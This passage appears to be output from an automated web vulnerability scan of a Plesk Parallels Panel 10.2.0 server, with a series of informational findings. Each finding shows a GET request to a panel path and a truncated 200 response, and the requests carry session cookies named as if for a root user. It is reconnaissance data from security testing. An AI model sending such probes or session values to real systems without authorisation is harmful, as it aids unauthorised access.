Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:20:38 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:20:46 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:20:46 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.233. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/account/action-name/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/controller-name/account/action-name/

Request

GET /smb/help/redirect/controller-name/account/action-name/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:20:38 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:20:46 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:20:46 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.234. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/account/action-name/create-subscription  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/controller-name/account/action-name/create-subscription

Request

GET /smb/help/redirect/controller-name/account/action-name/create-subscription HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sun, 23 Oct 2011 19:25:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:25:30 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:25:30 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.235. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/admin-home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/controller-name/admin-home/

Request

GET /smb/help/redirect/controller-name/admin-home/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:20:51 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:21:00 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:21:00 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.236. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/admin-home/action-name/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/controller-name/admin-home/action-name/

Request

GET /smb/help/redirect/controller-name/admin-home/action-name/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:20:47 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:20:56 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:20:56 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.237. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/admin-home/action-name/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/controller-name/admin-home/action-name/index

Request

GET /smb/help/redirect/controller-name/admin-home/action-name/index HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sun, 23 Oct 2011 19:25:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:25:30 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:25:30 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.238. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/my-profile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/controller-name/my-profile/

Request

GET /smb/help/redirect/controller-name/my-profile/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:21:49 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:21:57 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:21:57 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.239. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/my-profile/action-name/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/controller-name/my-profile/action-name/

Request

GET /smb/help/redirect/controller-name/my-profile/action-name/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:21:55 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:22:03 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:22:03 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.240. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/my-profile/action-name/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/controller-name/my-profile/action-name/index

Request

GET /smb/help/redirect/controller-name/my-profile/action-name/index HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/my-profile
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; psaContext=personal-info; PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:22:04 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:22:09 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:22:09 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.241. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/subscription/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/controller-name/subscription/

Request

GET /smb/help/redirect/controller-name/subscription/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:20:02 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:20:10 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:20:10 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.242. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/subscription/action-name/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/controller-name/subscription/action-name/

Request

GET /smb/help/redirect/controller-name/subscription/action-name/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:19:53 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:19:58 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:19:59 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.243. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/subscription/action-name/logout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/controller-name/subscription/action-name/logout

Request

GET /smb/help/redirect/controller-name/subscription/action-name/logout HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sun, 23 Oct 2011 19:25:29 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:25:30 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:25:30 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.244. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/my-profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/my-profile

Request

GET /smb/my-profile HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d8ba52f4ed7d0d502435be2945503b28; locale=en-US

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 12:15:20 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 12:15:20 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 12:15:20 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.245. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/scripts/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/scripts/

Request

GET /smb/scripts/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:19:53 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:19:58 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:19:58 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.246. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/user/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/user/

Request

GET /smb/user/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=subscriptions; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:25:08 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:25:08 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:25:09 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

